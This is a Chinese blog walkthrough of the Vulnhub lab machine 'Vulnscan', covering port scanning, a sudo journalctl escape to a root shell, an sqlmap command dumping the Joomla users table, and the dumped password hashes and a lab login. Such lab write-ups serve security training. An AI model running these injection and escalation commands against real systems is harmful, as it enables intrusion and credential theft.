Vulnhub系列--Vulnscan

最新推荐文章于 2024-03-27 09:36:17 发布
最新推荐文章于 2024-03-27 09:36:17 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: Vulnhub 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blateor/article/details/124432196
版权

image

tragte IP: 192.168.139.136

信息收集

nmap -A 192.168.139.136

image

开放5个服务,分别为:

  • 22: ssh
  • 5000: wordpress
  • 80: http
  • 8081: joomla
  • 9001: Drupal

逐个分析漏洞

wordpress

发现存在一个命令执行:

http://fsociety.web:5000/admin-wp/

image

依据时间发现存在用户名和密码,可以直接登录,反弹shell一直失败

image

登录后可以得到:

image

image

journalctl不需要密码直接root执行,利用方式:https://gtfobins.github.io/gtfobins/journalctl/

使用方式:

sudo /bin/journalctl
!/bin/bash

image

image

image

joomla

image

发现存在sql注入,直接注入可得用户名和密码:

sqlmap -u "http://192.168.139.136:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users  --dump

image

usernamepasswordemail
joomlaCMS_admin$2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWeeFluntence54@armyspy.com
elliot$2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy5T3e!_M0un7i@N

可以看到elliot的邮箱就是密码,可以直接登录:

image

Drupal

image

版本为7.54,搜索exploit:

image

image

image

ch3cke
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows操作系统——WindowsVulnScan提权辅助工具简介与使用教程
liver100day的博客
11-16 1万+
文章目录WindowsVulnScan提权辅助工具简介与使用教程1.工具简介2.工具使用教程1、运行powershell脚本KBCollect.ps1收集信息2.进入powershell3.输入脚本名称并运行4.KBCollect.ps1脚本运行结束后,会在当前目录生成一个KB.json文件,该文件详细描述当前操作系统的版本信息与已经打过的漏洞补丁信息5.运行python脚本cve-check.py -u 创建CVEKB数据库6.运行python脚本7.运行python脚本后言 WindowsVulnSca
Vulnscan:Nmap&Vulners提供了一些代码,因此您不必弄乱命令行-并不是说这有什么问题。
02-17
沃恩斯坎 Cyber​​ IQ Vulnscan使用Nmap和Vulners扫描外部目标或内部网络中的漏洞。 通过提示您输入Nmap在其命令行参数中使用的值,它使过程变得更简单。 它将指导您选择目标,端口和扫描速度。 它是Python和Bash脚本的组合,可以自动确定内部扫描的IP地址,CIDR,广播地址,网关和网络地址。 External_vulnscan将扫描外部IP地址或Web应用程序。 完成后,Vulnscan将在Web浏览器中显示Nmap / Vulners扫描的输出。 赋予脚本执行权限:sudo chmod + x external_vulnscan.sh vulnscan.sh 转到您的nmap脚本:cd / usr / share / nmap / scripts / 克隆Vulners git:sudo git clone 安装netifaces模块命令:
蓝队自检工具 -- WindowsVulnScan
weixin_41489908的博客
09-18 1250
一、下载地址(原作者): https://github.com/chroblert/WindowsVulnScan 二、使用方法 1、搜集目标主机上的漏洞,以管理员身份打开cmd,进入到windowsvulnscan目录 2、进入powershell 3、设置可运行脚本,set-ExecutionPolicy RemoteSigned 4、运行KBCollect.ps1 5、生成kb.json文件,里面有我们的漏洞信息 {"basicInfo":{"windowsProduct
nmap-vuln-scan
02-18
nmap-vuln-scan
探索Windows漏洞扫描利器:WindowsVulnScan
gitblog_00086的博客
03-27 454
探索Windows漏洞扫描利器:WindowsVulnScan 项目地址:https://gitcode.com/chroblert/WindowsVulnScan WindowsVulnScan 是一个基于Python开发的开源工具,旨在帮助系统管理员和安全专业人士轻松检测Windows系统的潜在安全漏洞。通过自动化扫描,它能够识别出系统中未修补的安全更新,从而提高整体安全性并预防可能的攻击。 ...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
nmap –script 使用:nmap-vulners 和 vulscan出现错误 ‘/usr/bin/../share/nmap/scripts/vulscan’ found, but will
xfyuanjun520的博客
03-22 3896
在新版本nmap中,添加了scripts功能使用,其存储在nmap的安装目录的scripts中,例如 /usr/share/nmap/scripts,已含有将600+个写好的丰富脚本,本文主要讲解在添加nmap-vulners和vulscan脚本后,扫描过程中出现的’/usr/bin/../share/nmap/scripts/vulscan’ found, but will not match without ‘/’问题 使用vulscan扫描错误日志,分析得知缺少”/” # nmap --sc
vulnhub--LinEsc
weixin_45922278的博客
02-15 860
描述 LinEsc是一台旨在演示Linux特权升级的7种最常见方式的机器。 目标:通过7种不同方式获得root特权。 默认凭据:(muhammad:nasef) 靶机下载地址:http://www.vulnhub.com/entry/linesc-1,616/ Linux提权技术合集: https://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653571678&idx=1&sn=67c068ff3eb6406...
自动化渗透扫描工具
07-24 1324
自动化渗透扫描工具,集成了很多信息收集的开源工具,其中包含于各大工具的API。 工具特点: 攻击面发现 轻松发现攻击面(IP、域名、开放端口、HTTP 标头等)。 渗透测试 使用最新的黑客和开源安全工具自动发现漏洞和道德利用 视觉侦察 使用幻灯片小部件和缩略图对工作区中的所有主机执行视觉侦察 IT资产盘点 搜索、排序和过滤整个攻击面清单的 DNS、IP、标题、状态、服务器标头、WAF 和打开的 TCP/UDP 端口。 红队 加强对自动化渗透测试技术的“蓝队”响应和检测能力 记事本
基于Django 的多功能 Web 应用渗透测试系统开发
简简的博客
11-08 4303
前言 **本项目已开源:**快去 Star & Fork 吧!!! GitHub:https://github.com/jwt1399/Sec-Tools Gitee:https://gitee.com/jwt1399/Sec-Tools 项目介绍 系统简介 本项目命名为Sec-Tools,是一款基于 Python-Django 的在线多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。本系统通过旁站探测和域名探测功能对待检测网站进
web漏洞扫描工具_Windows主机漏洞扫描工具
weixin_39963096的博客
12-05 478
0x00说明:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。功能:查找主机上具有的CVE查找具有公开EXP的CVE0x01 起...
linux提权(LinEsc)
weixin_51692662的博客
11-11 759
linux提权
VulnHub靶机_HACKABLE: III
学术渣渣的博客
08-31 602
文章目录靶机介绍渗透过程准备获取IP端口扫描 靶机介绍 下载地址: http://www.vulnhub.com/entry/hackable-iii,720/ 难度:中等 渗透过程 准备 将靶机下载下来,我这里使用的是virtualbox,下载的是.ova文件。下载之后用virtualbox打开,设置网络为桥接模式。 获取IP 使用arp-scan工具,我们得到靶机的IP为:192.168.1.104。 arp-scan -l 端口扫描 nmap -A -T4 -p 1-65535 192.168.1
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值